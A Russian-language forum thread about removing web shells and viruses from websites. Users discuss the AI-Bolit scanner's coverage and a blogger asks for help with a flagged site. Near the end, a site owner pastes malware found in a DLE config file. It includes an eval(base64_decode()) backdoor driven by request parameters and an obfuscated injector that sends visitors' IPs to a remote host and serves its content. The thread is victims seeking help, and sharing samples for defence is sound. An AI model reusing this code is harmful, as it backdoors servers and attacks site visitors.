Общая тема о борьбе с шеллами и вирусами на сайте

О, боже, придется искать специалиста. На такой подвиг я не способна)

Никого не порекомендуете? В теме или в личку.

Айболит бинарники не возьмет. На это есть виндовые антиврусники.

ЗЫ. зафлудили топик окончательно.. А ведь как хорошо начиналось:

Находит.................

Для поиска вирусов на сайте с них толку мало.

Если и находит, то я думаю простой текст дописанный в бинариник. А скомпилированные - нет. Я думаю, лучше попросим gregzemа самому рассказать. (Ждем, я маякнул)

==АПД==

Заглянул в код.

'scan_all_files' => 0, // full scan (rather than just a .js, .php, .html, .htaccess)
...
$l_NeedToScan = SCAN_ALL_FILES || (in_array($l_Ext, array(
				'js', 'php', 'php3', 'phtml', 'shtml', 'khtml',
				'php4', 'php5', 'tpl', 'inc', 'htaccess', 'html', 'htm'
			)));
..

Насколько я понимаю, по умолчанию он сканит только указанные расширения.

=====

пЕсатли! Готовьтесь уже к сентябрю. Осталось всего 2,5 месяца.

Несколько счастливых лет некоммерческий сайт (блог) на ворд-прессе жил спокойной жизнью. Буквально неделю назад Яндекс сообщил о том, что на моем любимце появился вирусяка. Работать и радовать людей информацией по теме стало невозможно. Посещаемость упала на ноль. Никто не хочет заходить. Сам далек от матчасти и самой темы. Прошу помощи, кто готов вылечить питомца или подсказать, что с ним не так.

Клиент: http://nicblog.ru/

Пожалуйста, помогите...

Вслух прочитать топик или правила форума? Дорого.

Айболит всеяден. Если, например, в JPG метаданных будет "eval(base64_decode(" и подобные штуки - все найдется.

Если речь про Linux бинарники - их он тоже сканирует по сигнатуре []ELF в начале файла.

В EXE искать Win32 вирусы он, конечно, не будет. Он не для этого совсем.

---------- Добавлено 19.06.2013 в 15:10 ----------

Есть два режима: быстрый и полный. Быстрый - это когда запускается из браузера. Сканит только расширения .php, .phtml, .js, htm* и т.п. Критичные то есть.

При запуске из командной строки сканирует вообще все, включая .zip, .rar. Из веба тоже можно запустить в режиме полного сканирования, если указать ключик aibolit.php?full=1. Только настройки сервера должны позволять "молотить" минут 20 без остановки.

---------- Добавлено 19.06.2013 в 15:14 ----------

У меня предложение: а почему бы сразу не удалять оффтопик посты из темы? В ней сейчас ничего не найти полезного. Один флуд.

Вы здесь модератором себя уявили? Или у вас мания величия?

По делу, мой сайт яша простил. Но теперь Bitdefender на него злится. Если на нем вирусов нет, то Bitdefender сам его пересмотрит, или им отписать надо?

вот жеж, и мне бяку засунули в dbconfig, дле 9.4, сейчас ищу источник

<?php
if(!empty($_POST['g1'])) {
eval(base64_decode($_POST['g1']));
die;
}
if(!empty($_POST['g2'])) eval(base64_decode($_POST['g2']));
if(!empty($_GET['g2'])) eval(base64_decode($_GET['g2']));

тут содержимое файла

function getnewsfromid($id) {
	$id = intval($id);
	$rtn = $id + date("j");
	return $rtn;
}

function mysql_safe_connect($in) {
	if (getnewsfromid(64) < 1024) {
	$rtn = base64_decode($in);
	return $rtn;
	}
}
function get_all_news_by_list($newsid) {
	if (date("j") - $newsid > 320 ) {
		$rtn = false;
	} else {
	$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzcvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
	if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
	echo @file_get_contents($get);
	}
	}
}
get_all_news_by_list (date("j"));?>

кто в этом разбирается - тут нет намека кудой они пролезли? :)